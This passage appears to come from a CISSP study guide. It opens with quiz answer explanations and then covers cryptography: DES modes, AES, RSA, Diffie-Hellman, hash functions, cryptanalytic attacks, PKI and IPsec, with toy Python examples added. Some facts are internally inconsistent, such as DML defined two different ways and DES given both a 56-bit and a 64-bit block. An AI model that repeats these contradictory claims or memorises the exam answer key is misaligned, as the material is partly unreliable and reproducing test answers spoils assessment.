Incorrect answers and explanations: A, C, and D. Answers A, C, and D are incorrect. Agile describes numerous development methodologies, including XP: XP is a better answer because it is more specific. Sashimi is a Waterfall Model variant. Scrum is a different Agile methodology that uses small teams.
2. Correct answer and explanation: D. Answer D is correct; polymorphism (based on the Greek roots "poly" and "morph," meaning "many" and "forms," respectively) allows the ability to overload operators, performing different methods depending on the context of the input message.
Incorrect answers and explanations: A, B, and C. Answers A, B, and C are incorrect. Delegation allows objects to delegate messages to other objects. Inheritance means an object inherits capabilities from its parent class. Polyinstantiation means "many instances," two objects with the same names that have different data.
3. Correct answer and explanation: A. Answer A is correct; Data Definition Language (DDL) is used to create, modify, and delete tables.
Incorrect answers and explanations: B, C, and D. Answers B, C, and D are incorrect. Data Manipulation Language (DML) is used to create, modify, and delete tables. Data Manipulation Language (DML) is used to query and update data stored in the tables. Database Management System (DBMS) manages the database system and provides security features. Structured Query Language (SQL) is a database query language that includes both DDL and DML. DDL is more specific than SQL, so it is a better answer for this question.
4. Correct answer and explanation: A. Answer A is correct; entity integrity means each tuple has a unique primary key that is not null.
Incorrect answers and explanations: B, C, and D. Answers B, C, and D are incorrect. Normalization seeks to make the data in a database table logically concise, organized, and consistent. Referential integrity means that every foreign key in a secondary table matches a primary key in the parent table: if this is not true, referential integrity has been broken. Semantic integrity means each attribute (column) value is consistent with the attribute data type.
5. Correct answer and explanation: A. Answer A is correct; Cross-Site Request Forgery (CSRF) allows a third party to redirect static content within the security context of a trusted site.
Incorrect answers and explanations: B, C, and D. Answers B, C, and D are incorrect. Cross-Site Scripting (XSS) is third-party execution of a web scripting language (such as JavaScript) within the security context of a trusted site. XSS is similar to CSRF; the difference is XSS uses active code. PHP Remote File Inclusion (RFI) alters normal PHP variables to reference remote content, which can lead to execution of malicious PHP code. SQL injection manipulates a back-end SQL server via a front-end Web server.

2 DCOM Technical Overview. http://technet.microsoft.com/en-us/library/cc722925.aspx [accessed June 26, 2013].
3 2011 CWE/SANS Top 25 Most Dangerous Software Errors. http://cwe.mitre.org/top25/ [accessed June 26, 2013].

CHAPTER 5

Domain 5: Cryptography
Abstract
Domain 5: Cryptography, presented in this chapter, presents another rather technical domain of the CISSP. This chapter presents key cryptographic concepts of authentication and nonrepudiation in addition to confidentiality and integrity, which are concepts presented in many of the domains. Beyond the foundational operations such as substitution and permutation and types of cryptosystems, symmetric, asymmetric, and hashing, this chapter also introduces key modes of operation for symmetric cryptosystems, Electronic Code Book (ECB), Cipher Block Chaining (CBC), Cipher Feedback (CFB), Output Feedback (OFB), and Counter Mode (CTR). An additional goal of this chapter is presenting key characteristics of those cryptographic algorithms most likely to be seen in the CISSP.

KEYWORDS
Plaintext; Ciphertext; Cryptography; Cryptanalysis; Cryptology; Symmetric encryption; Asymmetric encryption; Hash function; Digital signature; Nonrepudiation

Exam Objectives in This Chapter

Cornerstone Cryptographic Concepts
Symmetric Encryption
Asymmetric Encryption
Hash Functions
Cryptographic Attacks
Implementing Cryptography

Introduction
Cryptography is secret writing: secure communication that may be understood by the intended recipient only. While the fact that data is being transmitted may be known, the content of that data should remain unknown to third parties. Data in motion (moving on a network) and at rest (stored on a device such as a disk) may be encrypted.

CORNERSTONE CRYPTOGRAPHIC CONCEPTS

Fundamental cryptographic concepts are embodied by all strong encryption and must be understood before learning about specific implementations.

Key terms

Cryptology is the science of secure communications. Cryptography creates messages whose meaning is hidden; cryptanalysis is the science of breaking encrypted messages (recovering their meaning). Many use the term "cryptography" in place of "cryptology": it is important to remember that cryptology encompasses both cryptography and cryptanalysis.
A cipher is a cryptographic algorithm. A plaintext is an unencrypted message. Encryption converts the plaintext to a ciphertext. Decryption turns a ciphertext back into a plaintext.

Confidentiality, integrity, authentication, and nonrepudiation

Cryptography can provide confidentiality (secrets remain secret) and integrity (data is not altered in an unauthorized manner): it is important to note that it does not directly provide availability. Cryptography can also provide authentication (proving an identity claim).
Additionally, cryptography can provide nonrepudiation, which is an assurance that a specific user performed a specific transaction and that the transaction did not change.

Substitution and permutation

Cryptographic substitution replaces one character for another; this provides confusion. Permutation (also called transposition) provides diffusion by rearranging the characters of the plaintext, anagram-style. "ATTACK AT DAWN" can be rearranged to "CAAKDTANTATW," for example. Substitution and permutation are often combined.

Did You Know?
Strong encryption destroys patterns. If a single bit of plaintext changes, the odds of every bit of resulting ciphertext changing should be 50/50. Any signs of nonrandomness may be used as clues to a cryptanalyst, hinting at the underlying order of the original plaintext or key.

Cryptographic strength

Good encryption is strong: for key-based encryption, it should be very difficult (and ideally impossible) to convert a ciphertext back to a plaintext without the key. The work factor describes how long it will take to break a cryptosystem (decrypt a ciphertext without the key).
Secrecy of the cryptographic algorithm does not provide strength: in fact secret algorithms are often proven quite weak. Strong crypto relies on math, not secrecy, to provide strength. Ciphers that have stood the test of time are public algorithms, such as the Triple Data Encryption Standard (TDES) and the Advanced Encryption Standard (AES).

Monoalphabetic and polyalphabetic ciphers

A monoalphabetic cipher uses one alphabet: a specific letter (like "E") is substituted for another (like "X"). A polyalphabetic cipher uses multiple alphabets: "E" may be substituted for "X" one round and then "S" the next round.
Monoalphabetic ciphers are susceptible to frequency analysis. Polyalphabetic ciphers attempt to address this issue via the use of multiple alphabets.

Exclusive Or (XOR)

Exclusive Or (XOR) is the "secret sauce" behind modern encryption. Combining a key with a plaintext via XOR creates a ciphertext. XORing the same key to the ciphertext restores the original plaintext. XOR math is fast and simple.
Two bits are true (or 1) if one or the other (exclusively, not both) is 1. In other words, if two bits are different, the answer is 1 (true). If two bits are the same, the answer is 0 (false). XOR uses a truth table, shown in Table 5.1. This dictates how to combine the bits of a key and plaintext.

Table 5.1
XOR Truth Table

Types of cryptography

There are three primary types of modern encryption: symmetric, asymmetric, and hashing. Symmetric encryption uses one key: the same key encrypts and decrypts. Asymmetric cryptography uses two keys: if you encrypt with one key, you may decrypt with the other. Hashing is a one-way cryptographic transformation using an algorithm (and no key).
Cryptographic protocol governance describes the process of selecting the right method (cipher) and implementation for the right job, typically at an organization-wide scale. For example, a digital signature provides authentication and integrity, but not confidentiality. Symmetric ciphers are primarily used for confidentiality, and AES is preferable over DES due to strength and performance reasons (which we will also discuss later).

SYMMETRIC ENCRYPTION
Symmetric encryption uses one key to encrypt and decrypt. If you encrypt a zip file and then decrypt with the same key, you are using symmetric encryption. Symmetric encryption is also called "secret key" encryption: the key must be kept secret from third parties. Strengths include speed and cryptographic strength per bit of key. The major weakness is that the key must be securely shared before two parties may communicate securely. Symmetric keys are often shared via an out-of-band method, such as via face-to-face discussion.

Stream and block ciphers

Symmetric encryption may have stream and block modes. Stream mode means each bit is independently encrypted in a "stream." Block mode ciphers encrypt blocks of data each round: 56 bits for the Data Encryption Standard (DES) and 128, 192, or 256 bits for AES, for example. Some block ciphers can emulate stream ciphers by setting the block size to 1 bit; they are still considered block ciphers.

Initialization vectors and chaining

An initialization vector is used in some symmetric ciphers to ensure that the first encrypted block of data is random. This ensures that identical plaintexts encrypt to different ciphertexts. Also, as Bruce Schneier notes in Applied Cryptography, "Even worse, two messages that begin the same will encrypt the same way up to the first difference. Some messages have a common header: a letterhead, or a 'From' line, or whatever." Initialization vectors solve this problem.
Chaining (called feedback in stream modes) seeds the previous encrypted block into the next block to be encrypted. This destroys patterns in the resulting ciphertext. DES Electronic Code Book mode (see below) does not use an initialization vector or chaining and patterns can be clearly visible in the resulting ciphertext.

DES

DES is the Data Encryption Standard, which describes the Data Encryption Algorithm (DEA). IBM designed DES, based on their older Lucifer symmetric cipher. It uses a 64-bit block size (meaning it encrypts 64 bits each round) and a 56-bit key.

Exam Warning

Even though DES is commonly referred to as an algorithm, DES is technically the name of the published standard that describes DEA. It may sound like splitting hairs, but that is an important distinction to keep in mind on the exam. DEA may be the best answer for a question regarding the algorithm itself.

Modes of DES

DES can use five different modes to encrypt data. The modes' primary difference is block versus (emulated) stream, the use of initialization vectors, and whether errors in encryption will propagate to subsequent blocks.

Fast Facts
The five modes of DES are:
Electronic Code Book (ECB)
Cipher Block Chaining (CBC)
Cipher Feedback (CFB)
Output Feedback (OFB)
Counter Mode (CTR)

ECB is the original mode of DES. CBC, CFB, and OFB were later added in FIPS Publication 81 (see http://www.itl.nist.gov/fipspubs/fip81.htm). CTR mode is the newest mode, described in NIST Special Publication 800-38a (see http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf).

Electronic Code Book

Electronic Code Book (ECB) is the simplest and weakest form of DES. It uses no initialization vector or chaining. Identical plaintexts with identical keys encrypt to identical ciphertexts. Two plaintexts with partial identical portions (such as the header of a letter) encrypted with the same key will have partial identical ciphertext portions.

Cipher Block Chaining

Cipher Block Chaining (CBC) mode is a block mode of DES that XORs the previous encrypted block of ciphertext to the next block of plaintext to be encrypted. The first encrypted block is an initialization vector that contains random data. This "chaining" destroys patterns. One limitation of CBC mode is that encryption errors will propagate: an encryption error in one block will cascade through subsequent blocks due to the chaining, destroying their integrity.

Cipher Feedback

Cipher Feedback (CFB) mode is very similar to CBC; the primary difference is CFB is a stream mode. It uses feedback (the name for chaining when used in stream modes) to destroy patterns. Like CBC, CFB uses an initialization vector and destroys patterns, and errors propagate.

Output Feedback

Output Feedback (OFB) mode differs from CFB in the way feedback is accomplished. CFB uses the previous ciphertext for feedback. The previous ciphertext is the subkey XORed to the plaintext. OFB uses the subkey before it is XORed to the plaintext. Since the subkey is not affected by encryption errors, errors will not propagate.

Counter

Counter (CTR) mode is like OFB; the difference again is the feedback: CTR mode uses a counter. This mode shares the same advantages as OFB (patterns are destroyed and errors do not propagate) with an additional advantage: since the feedback can be as simple as an ascending number, CTR mode encryption can be done in parallel.
Table 5.2 summarizes the five modes of DES.

Table 5.2
Modes of DES Summary
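To make the pattern leak and the error-propagation differences between the modes concrete, the following added Python example (not from the book) builds a toy 8-byte Feistel block cipher out of SHA-256, which merely stands in for DES and is not a secure cipher, and runs ECB, CBC and CTR on top of it; it also exercises the XOR property from the "Exclusive Or" section, since CTR is pure keystream XOR. The key, IV, nonce and repeated-header plaintext are constructed.

```python
# Added example (not the book's code): a toy Feistel block cipher built from
# SHA-256 (NOT secure, a stand-in for DES) plus ECB, CBC and CTR modes.
import hashlib

BLOCK = 8           # bytes per block, like DES


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round_func(key, half, rnd):
    # Keyed round function: 4 bytes derived from the key, round number and half-block.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[: BLOCK // 2]


def block_encrypt(key, block):
    left, right = block[: BLOCK // 2], block[BLOCK // 2 :]
    for rnd in range(4):                      # 4 Feistel rounds
        left, right = right, xor(left, _round_func(key, right, rnd))
    return left + right


def block_decrypt(key, block):
    left, right = block[: BLOCK // 2], block[BLOCK // 2 :]
    for rnd in reversed(range(4)):            # undo the rounds in reverse order
        left, right = xor(right, _round_func(key, left, rnd)), left
    return left + right


def blocks(data):
    return [data[i : i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(key, pt):
    return b"".join(block_encrypt(key, b) for b in blocks(pt))


def ecb_decrypt(key, ct):
    return b"".join(block_decrypt(key, b) for b in blocks(ct))


def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for b in blocks(pt):
        prev = block_encrypt(key, xor(b, prev))    # chain previous ciphertext in
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for b in blocks(ct):
        out.append(xor(block_decrypt(key, b), prev))
        prev = b
    return b"".join(out)


def ctr_crypt(key, nonce, data):
    """CTR: encrypt nonce||counter, XOR the keystream with the data.
    XORing the same keystream again restores the original, so one
    function both encrypts and decrypts."""
    out = []
    for i, b in enumerate(blocks(data)):
        keystream = block_encrypt(key, nonce[:4] + i.to_bytes(4, "big"))
        out.append(xor(b, keystream))
    return b"".join(out)


def flip_bit(data, byte_index, bit):
    buf = bytearray(data)
    buf[byte_index] ^= 1 << bit
    return bytes(buf)


def changed_blocks(original, recovered):
    """Indexes of plaintext blocks that differ after decrypting corrupted ciphertext."""
    return [i for i, (a, b) in enumerate(zip(blocks(original), blocks(recovered))) if a != b]


def demo(key=b"constructed-key!", iv=b"\x00" * BLOCK, nonce=b"\x01\x02\x03\x04"):
    # Constructed plaintext: a repeated 8-byte header, like a letterhead.
    pt = b"LETTERHD" * 2 + b"body one" + b"body two"
    ecb = ecb_encrypt(key, pt)
    cbc = cbc_encrypt(key, iv, pt)
    ctr = ctr_crypt(key, nonce, pt)
    recovered = (ecb_decrypt(key, ecb), cbc_decrypt(key, iv, cbc), ctr_crypt(key, nonce, ctr))
    corrupt = lambda ct: flip_bit(ct, BLOCK + 1, 0)    # one bit inside block 1
    return {
        "ecb_leaks_pattern": blocks(ecb)[0] == blocks(ecb)[1],   # True: identical blocks
        "cbc_leaks_pattern": blocks(cbc)[0] == blocks(cbc)[1],   # False: chaining hides it
        "round_trip": recovered == (pt, pt, pt),
        "cbc_error_blocks": changed_blocks(pt, cbc_decrypt(key, iv, corrupt(cbc))),   # [1, 2]
        "ctr_error_blocks": changed_blocks(pt, ctr_crypt(key, nonce, corrupt(ctr))),  # [1]
    }


if __name__ == "__main__":
    print(demo())
```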

Single DES

Single DES is the original implementation of DES, encrypting 64-bit blocks of data with a 56-bit key, using 16 rounds of encryption. The work factor required to break DES was reasonable in 1976, but advances in CPU speed and parallel architecture have made DES weak to a brute-force key attack today, where every possible key is generated and attempted.

Triple DES

Triple DES applies single DES encryption three times per block. Formally called the Triple Data Encryption Algorithm (TDEA) and commonly called TDES or 3DES, it became a recommended standard in 1999.

Triple DES encryption order and keying options

Triple DES applies DES encryption three times per block. FIPS 46-3 describes "Encrypt, Decrypt, Encrypt" (EDE) order using three keying options: one, two, or three unique keys (called 1TDES EDE, 2TDES EDE, and 3TDES EDE, respectively).

International Data Encryption Algorithm

The International Data Encryption Algorithm is a symmetric block cipher designed as an international replacement to DES. The IDEA algorithm is patented in many countries. It uses a 128-bit key and 64-bit block size.

Advanced Encryption Standard

The Advanced Encryption Standard (AES) is the current U.S. standard symmetric block cipher. AES uses 128- (with 10 rounds of encryption), 192- (12 rounds of encryption), or 256-bit (14 rounds of encryption) keys to encrypt 128-bit blocks of data.

Choosing AES

The U.S. National Institute of Standards and Technology (NIST) solicited input on a replacement for DES in the Federal Register in January 1997. Fifteen AES candidates were announced in August 1998, and the list was reduced to five in August 1999. Table 5.3 lists the five AES finalists.

Table 5.3
Five AES Finalists

Rijndael was chosen and became AES. AES has four functions: SubBytes, ShiftRows, MixColumns, and AddRoundKey.

Blowfish and Twofish

Blowfish and Twofish are symmetric block ciphers created by teams led by Bruce Schneier, author of Applied Cryptography. Blowfish uses 32- through 448-bit (the default is 128) keys to encrypt 64 bits of data. Twofish was an AES finalist, encrypting 128-bit blocks using 128- through 256-bit keys. Both are open algorithms, unpatented, and freely available.

RC5 and RC6

RC5 and RC6 are symmetric block ciphers by RSA Laboratories. RC5 uses 32- (testing purposes), 64- (replacement for DES), or 128-bit blocks. The key size ranges from 0 to 2040 bits.
RC6 was an AES finalist. It is based on RC5, altered to meet the AES requirements. It is also stronger than RC5, encrypting 128-bit blocks using 128-, 192-, or 256-bit keys.

ASYMMETRIC ENCRYPTION
Asymmetric encryption uses two keys: if you encrypt with one key, you may decrypt with the other. One key may be made public (called the public key); asymmetric encryption is also called public key encryption for this reason. Anyone who wants to communicate with you may simply download your publicly posted public key and use it to encrypt their plaintext. Once encrypted, your public key cannot decrypt the plaintext: only your private key can do so. As the name implies, your private key must be kept private and secure.
Additionally, any message encrypted with the private key may be decrypted with the public key. This is typically used for digital signatures, as we will see shortly.

Asymmetric methods

Math lies behind the asymmetric breakthrough. These methods use one-way functions, which are easy to compute one way and difficult to compute in the reverse direction.

Factoring prime numbers

An example of a one-way function is factoring a composite number into its primes. Multiplying the prime number 6269 by the prime number 7883 results in the composite number 49,418,527. That way is quite easy to compute, taking milliseconds on a calculator. Answering the question "which prime number times which prime number equals 49,418,527" is much more difficult. That problem is called factoring, and no shortcut has been found for hundreds of years. This is the basis of the RSA algorithm.

Discrete logarithm

A logarithm is the opposite of exponentiation. Computing 7 to the 13th power (exponentiation) is easy on a modern calculator: 96,889,010,407. Asking the question "96,889,010,407 is 7 to what power" (finding the logarithm) is more difficult. Discrete logarithms apply logarithms to groups, which is a much harder problem to solve. This one-way function is the basis of the Diffie-Hellman and ElGamal asymmetric algorithms.

Diffie-Hellman Key Agreement Protocol

Key agreement allows two parties to securely agree on a symmetric key via a public channel, such as the Internet, with no prior key exchange. An attacker who is able to sniff the entire conversation is unable to derive the exchanged key. Whitfield Diffie and Martin Hellman created the Diffie-Hellman Key Agreement Protocol (also called the Diffie-Hellman Key Exchange) in 1976. Diffie-Hellman uses discrete logarithms to provide security.
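The one-way functions and the key agreement described in the last three sections, as an added Python example that is not the book's code: it uses the book's numbers 6269, 7883 and 7 to the 13th power, and a small constructed prime modulus 104729 with generator 5 for the Diffie-Hellman exchange. An eavesdropper holding only the public values must solve a discrete logarithm to get the key, which succeeds here only because the toy modulus is tiny; real parameters are thousands of bits long.

```python
# Added example (not the book's code): the easy and hard directions of the
# two one-way functions, and a toy Diffie-Hellman exchange built on the second.

def factor_semiprime(n):
    """Trial division: the slow direction of the multiplication one-way function."""
    p = 2
    while p * p <= n:
        if n % p == 0:
            return p, n // p
        p += 1
    return None


def discrete_log(base, target, modulus):
    """Brute-force the x with base**x % modulus == target; slow by design."""
    value = 1
    for x in range(modulus):
        if value == target:
            return x
        value = value * base % modulus
    return None


def dh_exchange(p, g, a, b):
    """Diffie-Hellman over a public channel; a and b are the private exponents.
    Returns the two public values and the key each side computes."""
    A = pow(g, a, p)              # Alice sends A = g^a mod p
    B = pow(g, b, p)              # Bob sends B = g^b mod p
    k_alice = pow(B, a, p)        # (g^b)^a mod p
    k_bob = pow(A, b, p)          # (g^a)^b mod p
    return {"public": (A, B), "alice": k_alice, "bob": k_bob}


def eavesdropper_key(p, g, A, B):
    """What someone who sniffed only p, g, A and B must do: solve a discrete log.
    Feasible only because this toy modulus is tiny (constructed value)."""
    a = discrete_log(g, A, p)
    return pow(B, a, p)


if __name__ == "__main__":
    print(6269 * 7883)                                  # 49418527: easy direction
    print(factor_semiprime(49418527))                   # (6269, 7883): search
    print(7 ** 13)                                      # 96889010407: easy direction
    print(discrete_log(7, pow(7, 13, 104729), 104729))  # 13: search in the group mod 104729
    ex = dh_exchange(p=104729, g=5, a=6269, b=7883)     # constructed toy parameters
    print(ex["alice"] == ex["bob"], ex)
```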
Elliptic Curve Cryptography

ECC leverages a one-way function that uses discrete logarithms as applied to elliptic curves. Solving this problem is harder than solving discrete logarithms, so algorithms based on Elliptic Curve Cryptography (ECC) are much stronger per bit than systems using discrete logarithms (and also stronger than factoring prime numbers). ECC requires less computational resources because shorter keys can be used compared to other asymmetric methods. ECC is often used in lower-power devices for this reason.

Asymmetric and symmetric trade-offs

Asymmetric encryption is far slower than symmetric encryption and is also weaker per bit of key length. The strength of asymmetric encryption is the ability to securely communicate without presharing a key.

HASH FUNCTIONS
A hash function provides encryption using an algorithm and no key. They are called "one-way hash functions" because there is no way to reverse the encryption. A variable-length plaintext is "hashed" into a (typically) fixed-length hash value (often called a "message digest" or simply a "hash"). Hash functions are primarily used to provide integrity: if the hash of a plaintext changes, the plaintext itself has changed. Common older hash functions include Secure Hash Algorithm 1 (SHA-1), which creates a 160-bit hash and Message Digest 5 (MD5), which creates a 128-bit hash. Weaknesses have been found in both MD5 and SHA-1; newer alternatives such as SHA-2 are recommended.

MD5

MD5 is the Message Digest algorithm 5, created by Ronald Rivest. It is the most widely used of the MD family of hash algorithms. MD5 creates a 128-bit hash value based on any input length. MD5 has been quite popular over the years, but weaknesses have been discovered where collisions could be found in a practical amount of time. MD6 is the newest version of the MD family of hash algorithms, first published in 2008.

Secure Hash Algorithm

Secure Hash Algorithm is the name of a series of hash algorithms. SHA-1 creates a 160-bit hash value. SHA-2 includes SHA-224, SHA-256, SHA-384, and SHA-512, named after the length of the message digest each creates.

HAVAL

HAVAL (Hash of Variable Length) is a hash algorithm that creates message digests of 128, 160, 192, 224, or 256 bits in length, using 3, 4, or 5 rounds. HAVAL uses some of the design principles behind the MD family of hash algorithms and is faster than MD5.

CRYPTOGRAPHIC ATTACKS
Cryptographic attacks are used by cryptanalysts to recover the plaintext
without the key. Please remember that recovering the key (sometimes called
"steal the key") is usually easier than breaking modern encryption. This is
what law enforcement typically does when faced with a suspect using
cryptography: they obtain a search warrant and attempt to recover the key.
Brute force

A brute-force attack generates the entire keyspace, which is every possible
key. Given enough time, the plaintext will be recovered.
Known plaintext

A known plaintext attack relies on recovering and analyzing a matching
plaintext and ciphertext pair: the goal is to derive the key that was used. You
may be wondering why you would need the key if you already have the
plaintext: recovering the key would allow you to decrypt other ciphertexts
encrypted with the same key.
Chosen plaintext and adaptive-chosen plaintext

A cryptanalyst chooses the plaintext to be encrypted in a chosen plaintext
attack; the goal is to derive the key. Encrypting without knowing the key is
done via an "encryption oracle," or a device that encrypts without revealing
the key.
Adaptive-chosen plaintext begins with a chosen plaintext attack in round 1.
The cryptanalyst then "adapts" further rounds of encryption based on the
previous round.
Chosen ciphertext and adaptive-chosen ciphertext

Chosen ciphertext attacks mirror chosen plaintext attacks: the difference is
that the cryptanalyst chooses the ciphertext to be decrypted. This attack is
usually launched against asymmetric cryptosystems, where the cryptanalyst
may choose public documents to decrypt that are signed (encrypted) with a
user's public key.
Adaptive-chosen ciphertext also mirrors its plaintext cousin: it begins with a
chosen ciphertext attack in round 1. The cryptanalyst then "adapts" further
rounds of decryption based on the previous round.
Meet-in-the-middle attack

A meet-in-the-middle attack encrypts on one side, decrypts on the other side,
and meets in the middle. The most common attack is against double DES,
which encrypts with two keys in "encrypt, encrypt" order. The attack is a
known plaintext attack: the attacker has a copy of a matching plaintext and
ciphertext and seeks to recover the two keys used to encrypt.
Known key

The term "known key attack" is misleading: if the cryptanalyst knows the
key, the attack is over. Known key means the cryptanalyst knows something
about the key, to reduce the efforts used to attack it. If the cryptanalyst knows
that the key is an uppercase letter and a number only, other characters may
be omitted in the attack.
Differential cryptanalysis

Differential cryptanalysis seeks to find the "difference" between related
plaintexts that are encrypted. The plaintexts may differ by a few bits. It is
usually launched as an adaptive-chosen plaintext attack: the attacker chooses
the plaintext to be encrypted (but does not know the key) and then encrypts
related plaintexts.
Linear cryptanalysis

Linear cryptanalysis is a known plaintext attack where the cryptanalyst finds
large amounts of plaintext/ciphertext pairs created with the same key. The
pairs are studied to derive information about the key used to create them.
Both differential and linear analyses can be combined as differential linear
analysis.
Side-channel attacks

Side-channel attacks use physical data to break a cryptosystem, such as
monitoring CPU cycles or power consumption used while encrypting or
decrypting.

IMPLEMENTING CRYPTOGRAPHY
Symmetric, asymmetric, and hash-based cryptography do not exist in a
vacuum: they are applied in the real world, often in combination, to provide
confidentiality, integrity, authentication, and nonrepudiation.
Digital signatures

Digital signatures are used to cryptographically sign documents. Digital
signatures provide nonrepudiation, which includes authentication of the
identity of the signer, and proof of the document's integrity (proving the
document did not change). This means the sender cannot later deny (or
repudiate) signing the document.
Roy wants to send a digitally signed email to Rick. Roy writes the email,
which is the plaintext. He then uses the SHA-1 hash function to generate a
hash value of the plaintext. He then creates the digital signature by
encrypting the hash with his RSA private key. Figure 5.1 shows this process.
Roy then attaches the signature to his plaintext email and hits "send."

FIGURE 5.1 Creating a digital signature.

Rick receives Roy's email and generates his own SHA-1 hash value of the
plaintext email. Rick then decrypts the digital signature with Roy's RSA
public key, recovering the SHA-1 hash Roy generated. Rick then compares his
SHA-1 hash with Roy's. Figure 5.2 shows this process.

FIGURE 5.2 Verifying a digital signature.

If the two hashes match, Rick knows a number of things:
1. Roy must have sent the email (only Roy knows his private key). This
authenticates Roy as the sender.
2. The email did not change. This proves the integrity of the email.
If the hashes match, Roy cannot later deny having signed the email. This is
nonrepudiation. If the hashes do not match, Rick knows either Roy did not
send it or that the email's integrity was violated.
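The Roy/Rick signing and verification flow just described, as an added example that is not from the study guide: textbook RSA signs the raw SHA-1 digest with the private key, and the verifier recovers the digest with the public key and compares it with a fresh hash of the received plaintext, as in Figures 5.1 and 5.2. Everything specific here is constructed: the key primes (Mersenne primes far too small for real use), the sample email, and the `demo` function.

```python
"""Added example (not from the study guide): the Roy/Rick digital signature
flow carried out with textbook RSA and SHA-1 in plain Python.
Assumptions (constructed for this example): the RSA modulus is built from two
Mersenne primes, 2**89-1 and 2**127-1, which are far too small for real use,
and the 160-bit digest is signed raw with no padding. Production signatures
use 2048-bit or larger moduli and a padding scheme such as PKCS#1 v1.5 or PSS."""
import hashlib

# Constructed toy-sized key material (Mersenne primes, known to be prime).
P = 2**89 - 1
Q = 2**127 - 1
E = 65537


def generate_keypair(p=P, q=Q, e=E):
    """Return ((e, n), (d, n)) for textbook RSA built from primes p and q."""
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)        # modular inverse (Python 3.8+)
    return (e, n), (d, n)


def sha1_as_int(message: bytes) -> int:
    """Step 1 of the text: hash the plaintext; the 160-bit digest becomes an
    integer, which is below the modulus n for the primes chosen above."""
    return int.from_bytes(hashlib.sha1(message).digest(), "big")


def sign(message: bytes, private_key) -> int:
    """Roy: 'encrypt' the SHA-1 hash with the RSA private key (d, n)."""
    d, n = private_key
    return pow(sha1_as_int(message), d, n)


def verify(message: bytes, signature: int, public_key) -> bool:
    """Rick: recover the hash with the public key (e, n) and compare it with
    a freshly computed SHA-1 hash of the plaintext he received."""
    e, n = public_key
    recovered_hash = pow(signature, e, n)
    return recovered_hash == sha1_as_int(message)


def demo():
    """Three cases: genuine, tampered in transit, and signed with the wrong key."""
    public_key, private_key = generate_keypair()
    email = b"Rick, the budget meeting moved to 3pm. -- Roy"   # constructed
    sig = sign(email, private_key)

    # Case 1: unmodified email, genuine signature: hashes match.
    genuine = verify(email, sig, public_key)
    # Case 2: one detail changed in transit: the integrity check fails.
    tampered = verify(email.replace(b"3pm", b"4pm"), sig, public_key)
    # Case 3: a signer without Roy's private key (constructed second key pair
    # from Mersenne primes 2**61-1 and 2**107-1): authentication fails.
    _, wrong_private = generate_keypair(p=2**61 - 1, q=2**107 - 1)
    forged = verify(email, sign(email, wrong_private), public_key)
    return genuine, tampered, forged


if __name__ == "__main__":
    print(demo())   # (True, False, False)
```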
Public Key Infrastructure

Public Key Infrastructure (PKI) leverages all three forms of encryption to
provide and manage digital certificates. A digital certificate is a public key
signed with a digital signature. Digital certificates may be server-based or
client-based. If the two are used together, they provide mutual authentication
and encryption. The standard digital certificate format is X.509.
Certificate Authorities and Organizational Registration Authorities

Digital certificates are issued by Certificate Authorities (CAs). Organizational
Registration Authorities (ORAs) authenticate the identity of a certificate
holder before issuing a certificate to them. An organization may act as a CA
or ORA (or both).
Certificate Revocation Lists

The Certification Authorities maintain Certificate Revocation Lists (CRL), which,
as the name implies, list certificates that have been revoked. A certificate may
be revoked if the private key has been stolen, an employee is terminated, etc.
A CRL is a flat file and does not scale well. The Online Certificate Status
Protocol (OCSP) is a replacement for CRLs and uses a client-server design that
scales better.
Key management issues

Certificate Authorities issue digital certificates and distribute them to
certificate holders. The confidentiality and integrity of the holder's private key
must be assured during the distribution process.
Public/private key pairs used in PKI should be stored centrally (and securely).
Users may lose their private key as easily as they may forget their password.
A lost private key that is not securely stored means that anything encrypted
with the matching public key will be lost (short of cryptanalysis described
previously).
Note that key storage is different than key escrow. Key storage means the
organization that issued the public/private key pairs retains a copy. Key
escrow, as we will discuss shortly, means a copy is retained by a third-party
organization (and sometimes multiple organizations), often for law
enforcement purposes.
A retired key may not be used for new transactions, but may be used to
decrypt previously encrypted plaintexts. A destroyed key no longer exists
and cannot be used for any purpose.
SSL and TLS

Secure Sockets Layer (SSL) brought the power of PKI to the Web. SSL
authenticates and provides confidentiality to Web traffic. Transport Layer
Security (TLS) is the successor to SSL. They are commonly used as part of
HTTPS (Hypertext Transfer Protocol Secure).
SSL was developed for the Netscape Web browser in the 1990s. SSL 2.0 was
the first released version; SSL 3.0 fixed a number of security issues with
version 2. TLS was based on SSL 3.0. TLS is very similar to that version, with
some security improvements. Although typically used for HTTPS to secure
Web traffic, TLS may be used for other applications such as Internet chat and
email server-to-server or client access.
IPsec

IPsec (Internet Protocol Security) is a suite of protocols that provide a
cryptographic layer to both IPv4 and IPv6. It is one of the methods used to
provide Virtual Private Networks (VPN), which allow you to send private data
over an insecure network, such as the Internet (the data crosses a public
network but is "virtually private"). IPsec includes two primary protocols:
Authentication Header (AH) and Encapsulating Security Payload (ESP). AH and
ESP provide different and sometimes overlapping functionalities.
Supporting IPsec protocols include Internet Security Association and Key
Management Protocol (ISAKMP) and Internet Key Exchange (IKE).
AH and ESP

Authentication Header provides authentication and integrity for each packet
of network data. AH provides no confidentiality; it acts as a digital signature
for the packet. AH also protects against replay attacks, where data is sniffed off
a network and resent, often in an attempt to fraudulently reuse encrypted
authentication credentials.
Encapsulating Security Payload primarily provides confidentiality by
encrypting packet data. It may also optionally provide authentication and
integrity.
Security association and ISAKMP

AH and ESP may be used separately or in combination. An IPsec Security
Association (SA) is a simplex (one-way) connection, which may be used to
negotiate ESP or AH parameters. If two systems communicate via ESP, they
use two SAs (one for each direction). If the systems leverage AH in addition
to ESP, they use two more SAs, for a total of four. A unique 32-bit number
called the Security Parameter Index (SPI) identifies each simplex SA
connection. The Internet Security Association and Key Management Protocol
(ISAKMP) manages the SA creation process.
Tunnel and transport mode

IPsec can be used in tunnel mode or transport mode. Tunnel mode is used by
security gateways (which can provide point-to-point IPsec tunnels). ESP
tunnel mode encrypts the entire packet, including the original packet headers.
ESP transport mode only encrypts the data (and not the original headers); this
is commonly used when the sending and receiving system can "speak" IPsec
natively.

Crunch Time
AH authenticates the original IP headers, so it is often used (along with
